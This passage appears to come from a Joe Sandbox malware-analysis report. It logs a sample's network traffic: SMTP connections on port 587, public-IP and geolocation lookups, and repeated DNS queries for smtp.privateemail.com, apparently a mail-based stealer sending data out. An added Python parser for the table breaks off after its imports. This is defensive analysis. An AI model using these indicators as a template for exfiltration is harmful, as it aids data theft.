Feb 2, 2021 08:52:22.813167095 CET  587          49741      199.193.7.228   192.168.2.7
Feb 2, 2021 08:52:22.813273907 CET  49741        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:22.813688993 CET  49740        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:22.837110043 CET  587          49741      199.193.7.228   192.168.2.7
Feb 2, 2021 08:52:22.837198019 CET  49741        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:22.837585926 CET  587          49741      199.193.7.228   192.168.2.7
Feb 2, 2021 08:52:22.837647915 CET  49741        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:22.881418943 CET  49740        587        192.168.2.7     199.193.7.228
Feb 2, 2021 08:52:23.003695965 CET  587          49740      199.193.7.228   192.168.2.7
Feb 2, 2021 08:52:23.004148006 CET  587          49740      199.193.7.228   192.168.2.7

UDP Packets

Timestamp                           Source Port  Dest Port  Source IP       Dest IP
Feb 2, 2021 08:51:30.116107941 CET  58717        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:30.172230959 CET  53           58717      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:31.337563992 CET  59762        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:31.400734901 CET  53           59762      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:32.221174002 CET  54329        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:32.273967981 CET  53           54329      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:33.975642920 CET  58052        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:34.026186943 CET  53           58052      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:35.326277971 CET  54008        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:35.374140978 CET  53           54008      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:38.306018114 CET  59451        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:38.362137079 CET  53           59451      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:39.282435894 CET  52914        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:39.335496902 CET  53           52914      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:40.727047920 CET  64569        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:40.777889967 CET  53           64569      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:42.254206896 CET  52816        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:42.310305119 CET  53           52816      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:43.344412088 CET  50781        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:43.392345905 CET  53           50781      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:44.466734886 CET  54230        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:44.516629934 CET  53           54230      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:45.447211981 CET  54911        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:45.477125883 CET  49958        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:45.505021095 CET  53           54911      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:45.529052973 CET  53           49958      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:46.893997908 CET  50860        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:46.941816092 CET  53           50860      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:48.213689089 CET  50452        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:48.261679888 CET  53           50452      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:50.513789892 CET  59730        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:50.572828054 CET  53           59730      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:52.579267979 CET  59310        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:52.630502939 CET  53           59310      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:53.379492044 CET  51919        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:53.438116074 CET  53           51919      8.8.8.8         192.168.2.7
Feb 2, 2021 08:51:53.900830984 CET  64296        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:51:53.960005045 CET  53           64296      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:00.056057930 CET  56680        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:00.112185001 CET  53           56680      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:04.437439919 CET  58820        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:04.487238884 CET  53           58820      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:04.516426086 CET  60983        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:04.566323042 CET  53           60983      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:12.981060028 CET  49247        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:13.041534901 CET  53           49247      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:17.680474997 CET  52286        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:17.738408089 CET  53           52286      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:17.837726116 CET  56064        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:17.900806904 CET  53           56064      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:18.850114107 CET  63744        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:18.898106098 CET  53           63744      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:22.276596069 CET  61457        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:22.335807085 CET  53           61457      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:23.339813948 CET  58367        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:23.400106907 CET  53           58367      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:24.584064960 CET  60599        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:24.643059969 CET  53           60599      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:25.612889051 CET  59571        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:25.671786070 CET  53           59571      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:27.152910948 CET  52689        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:27.212202072 CET  53           52689      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:28.490356922 CET  50290        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:28.546897888 CET  53           50290      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:30.280812979 CET  60427        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:30.337150097 CET  53           60427      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:32.047787905 CET  56209        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:32.104201078 CET  53           56209      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:33.669477940 CET  59582        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:33.717605114 CET  53           59582      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:33.987025976 CET  60949        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:34.043262005 CET  53           60949      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:36.163332939 CET  58542        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:36.223865032 CET  53           58542      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:37.289861917 CET  59179        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:37.348948956 CET  53           59179      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:38.025207043 CET  60927        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:38.086824894 CET  53           60927      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:40.204969883 CET  57854        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:40.252991915 CET  53           57854      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:40.299511909 CET  62026        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:40.356125116 CET  53           62026      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:40.632177114 CET  59453        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:40.688971043 CET  53           59453      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:42.364404917 CET  62468        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:42.421161890 CET  53           62468      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:43.485554934 CET  52563        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:43.541801929 CET  53           52563      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:44.979003906 CET  54721        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:45.028855085 CET  53           54721      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:47.347949982 CET  62826        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:47.405642033 CET  53           62826      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:47.588212013 CET  62046        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:47.647037029 CET  53           62046      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:50.374495983 CET  51223        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:50.431301117 CET  53           51223      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:50.658818007 CET  63908        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:50.706617117 CET  53           63908      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:53.261665106 CET  49226        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:53.313534021 CET  53           49226      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:56.275100946 CET  60212        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:56.331607103 CET  53           60212      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:59.256263018 CET  58867        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:59.312505007 CET  53           58867      8.8.8.8         192.168.2.7
Feb 2, 2021 08:52:59.423389912 CET  50864        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:52:59.482912064 CET  53           50864      8.8.8.8         192.168.2.7
Feb 2, 2021 08:53:00.292697906 CET  61504        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:53:00.353419065 CET  53           61504      8.8.8.8         192.168.2.7
Feb 2, 2021 08:53:01.004070044 CET  60231        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:53:01.060314894 CET  53           60231      8.8.8.8         192.168.2.7
Feb 2, 2021 08:53:02.156910896 CET  50095        53         192.168.2.7     8.8.8.8
Feb 2, 2021 08:53:02.204837084 CET  53           50095      8.8.8.8         192.168.2.7
                                                                                                  Feb 2, 2021 08:53:05.881093979 CET5965453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:05.928864956 CET53596548.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:09.224340916 CET5823353192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:09.281547070 CET53582338.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:10.724493980 CET5682253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:10.772320032 CET53568228.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:18.055473089 CET6257253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:18.103461981 CET53625728.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:20.778110027 CET5717953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:20.837517023 CET53571798.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:24.139029980 CET5612453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:24.195363045 CET53561248.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:26.415201902 CET6228753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:26.463123083 CET53622878.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:26.516926050 CET5464453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:26.564953089 CET53546448.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:27.549843073 CET5915953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:27.599453926 CET53591598.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:35.453262091 CET5792453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:35.512851000 CET53579248.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:35.593250036 CET5171253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:35.649574995 CET53517128.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:38.249537945 CET5886553192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:38.297360897 CET53588658.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:42.031311989 CET6433753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:42.090331078 CET53643378.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:45.081511021 CET5040753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:45.116350889 CET6107553192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:53:45.140338898 CET53504078.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:53:45.172378063 CET53610758.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:12.793908119 CET5495253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:12.842149973 CET53549528.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:15.301547050 CET5918653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:15.354489088 CET53591868.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:15.887363911 CET5228053192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:15.948564053 CET53522808.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:19.049554110 CET5179453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:19.097718954 CET53517948.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:22.277606964 CET5081553192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:22.327384949 CET53508158.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:23.821609020 CET5849853192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:23.880672932 CET53584988.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:33.298855066 CET5686253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:33.360323906 CET53568628.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:36.197577953 CET6180753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:36.201062918 CET5200953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:36.256642103 CET53618078.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:36.260183096 CET53520098.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:38.931622028 CET5864853192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:38.991988897 CET53586488.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:40.716998100 CET5933753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:40.767158031 CET53593378.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:41.961437941 CET5926953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:42.011138916 CET53592698.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:43.813313961 CET4980253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:43.863847971 CET53498028.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:48.922760010 CET5070653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:48.980370045 CET53507068.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:51.820154905 CET5515353192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:51.831574917 CET5974453192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:51.876228094 CET53551538.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:51.879745960 CET53597448.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:54.559792995 CET5998753192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:54.580755949 CET6127253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:54.609613895 CET53599878.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:54.630439997 CET53612728.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:57.268471956 CET5435253192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:57.316422939 CET53543528.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:54:57.419401884 CET6069653192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:54:57.477765083 CET53606968.8.8.8192.168.2.7
                                                                                                  Feb 2, 2021 08:55:11.386878967 CET5913953192.168.2.78.8.8.8
                                                                                                  Feb 2, 2021 08:55:11.436451912 CET53591398.8.8.8192.168.2.7

                                                                                                  DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Feb 2, 2021 08:51:53.379492044 CET | 192.168.2.7 | 8.8.8.8 | 0xf445 | Standard query (0) | 69.170.12.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 2, 2021 08:51:53.900830984 CET | 192.168.2.7 | 8.8.8.8 | 0x6da6 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.437439919 CET | 192.168.2.7 | 8.8.8.8 | 0x6b02 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:04.516426086 CET | 192.168.2.7 | 8.8.8.8 | 0xc21c | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:12.981060028 CET | 192.168.2.7 | 8.8.8.8 | 0x872a | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:22.276596069 CET | 192.168.2.7 | 8.8.8.8 | 0x849c | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:23.339813948 CET | 192.168.2.7 | 8.8.8.8 | 0xb3be | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:24.584064960 CET | 192.168.2.7 | 8.8.8.8 | 0x9e74 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:25.612889051 CET | 192.168.2.7 | 8.8.8.8 | 0x52d5 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:27.152910948 CET | 192.168.2.7 | 8.8.8.8 | 0xc1d8 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:28.490356922 CET | 192.168.2.7 | 8.8.8.8 | 0xc3b0 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:30.280812979 CET | 192.168.2.7 | 8.8.8.8 | 0x9914 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:32.047787905 CET | 192.168.2.7 | 8.8.8.8 | 0x276 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:33.987025976 CET | 192.168.2.7 | 8.8.8.8 | 0xd60a | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:36.163332939 CET | 192.168.2.7 | 8.8.8.8 | 0xb80c | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:37.289861917 CET | 192.168.2.7 | 8.8.8.8 | 0xcfe2 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:38.025207043 CET | 192.168.2.7 | 8.8.8.8 | 0x220e | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:40.204969883 CET | 192.168.2.7 | 8.8.8.8 | 0x91f5 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:40.299511909 CET | 192.168.2.7 | 8.8.8.8 | 0xfe1e | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:40.632177114 CET | 192.168.2.7 | 8.8.8.8 | 0xfc0e | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:42.364404917 CET | 192.168.2.7 | 8.8.8.8 | 0x368e | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:43.485554934 CET | 192.168.2.7 | 8.8.8.8 | 0xe0c2 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:44.979003906 CET | 192.168.2.7 | 8.8.8.8 | 0xbda6 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:47.347949982 CET | 192.168.2.7 | 8.8.8.8 | 0x1787 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:47.588212013 CET | 192.168.2.7 | 8.8.8.8 | 0x3404 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:50.374495983 CET | 192.168.2.7 | 8.8.8.8 | 0x3390 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:50.658818007 CET | 192.168.2.7 | 8.8.8.8 | 0x9a1a | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:53.261665106 CET | 192.168.2.7 | 8.8.8.8 | 0x7125 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:56.275100946 CET | 192.168.2.7 | 8.8.8.8 | 0xca4 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:59.256263018 CET | 192.168.2.7 | 8.8.8.8 | 0xb67f | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:52:59.423389912 CET | 192.168.2.7 | 8.8.8.8 | 0xe5c5 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:00.292697906 CET | 192.168.2.7 | 8.8.8.8 | 0x1a9c | Standard query (0) | 69.170.12.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Feb 2, 2021 08:53:01.004070044 CET | 192.168.2.7 | 8.8.8.8 | 0x3e9 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:02.156910896 CET | 192.168.2.7 | 8.8.8.8 | 0x747f | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:05.881093979 CET | 192.168.2.7 | 8.8.8.8 | 0x7f71 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:09.224340916 CET | 192.168.2.7 | 8.8.8.8 | 0x3367 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:18.055473089 CET | 192.168.2.7 | 8.8.8.8 | 0x249a | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:20.778110027 CET | 192.168.2.7 | 8.8.8.8 | 0x89c8 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:24.139029980 CET | 192.168.2.7 | 8.8.8.8 | 0x2a46 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:26.415201902 CET | 192.168.2.7 | 8.8.8.8 | 0x1132 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:26.516926050 CET | 192.168.2.7 | 8.8.8.8 | 0x667a | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:27.549843073 CET | 192.168.2.7 | 8.8.8.8 | 0x43b4 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:35.453262091 CET | 192.168.2.7 | 8.8.8.8 | 0xba64 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:35.593250036 CET | 192.168.2.7 | 8.8.8.8 | 0xbb55 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:38.249537945 CET | 192.168.2.7 | 8.8.8.8 | 0x74bc | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:42.031311989 CET | 192.168.2.7 | 8.8.8.8 | 0x3d6a | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:45.081511021 CET | 192.168.2.7 | 8.8.8.8 | 0x68c3 | Standard query (0) | freegeoip.app | A (IP address) | IN (0x0001)
Feb 2, 2021 08:53:45.116350889 CET | 192.168.2.7 | 8.8.8.8 | 0x5a1f | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:12.793908119 CET | 192.168.2.7 | 8.8.8.8 | 0xcb32 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:15.887363911 CET | 192.168.2.7 | 8.8.8.8 | 0xe537 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:19.049554110 CET | 192.168.2.7 | 8.8.8.8 | 0x224f | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:22.277606964 CET | 192.168.2.7 | 8.8.8.8 | 0xd7e | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:23.821609020 CET | 192.168.2.7 | 8.8.8.8 | 0xaef0 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:33.298855066 CET | 192.168.2.7 | 8.8.8.8 | 0xa8a1 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:36.197577953 CET | 192.168.2.7 | 8.8.8.8 | 0x92d2 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:36.201062918 CET | 192.168.2.7 | 8.8.8.8 | 0x2b45 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:38.931622028 CET | 192.168.2.7 | 8.8.8.8 | 0x874f | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:40.716998100 CET | 192.168.2.7 | 8.8.8.8 | 0xc8e5 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:41.961437941 CET | 192.168.2.7 | 8.8.8.8 | 0x53c9 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:43.813313961 CET | 192.168.2.7 | 8.8.8.8 | 0xca13 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:48.922760010 CET | 192.168.2.7 | 8.8.8.8 | 0xc966 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:51.820154905 CET | 192.168.2.7 | 8.8.8.8 | 0xba1a | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:51.831574917 CET | 192.168.2.7 | 8.8.8.8 | 0xecd6 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:54.559792995 CET | 192.168.2.7 | 8.8.8.8 | 0x5da3 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:54.580755949 CET | 192.168.2.7 | 8.8.8.8 | 0xee93 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:57.268471956 CET | 192.168.2.7 | 8.8.8.8 | 0x756b | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:54:57.419401884 CET | 192.168.2.7 | 8.8.8.8 | 0xaa2b | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Feb 2, 2021 08:55:11.386878967 CET | 192.168.2.7 | 8.8.8.8 | 0x1733 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
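The query table above is the raw material for two observations an analyst would want to make mechanically: the sample resolves public-IP and geolocation lookup services (whatismyipaddress.com, checkip.dyndns.org, freegeoip.app), and it resolves one SMTP host over and over in short succession, which is what a mail-based stealer produces while retrying delivery. The following is an added worked example written for this page, not code from the sandbox vendor or from the malware: it parses rows in the run-together form the HTML extraction produced and summarises them. The sandbox host address 192.168.2.7 is taken from this report, the watchlist of lookup services and the burst threshold are the analyst's own assumptions, and the sample rows are copied from the table.

```python
"""Parse flattened Joe Sandbox 'DNS Queries' rows and summarise them.

Added example for this page, not vendor code. Assumes the column order of
the table above (Timestamp, Source IP, Dest IP, Trans ID, OP Code, Name,
Type, Class), a known sandbox host address (192.168.2.7 in this report),
and an analyst-chosen watchlist of public-IP lookup services.
"""
import ipaddress
import re
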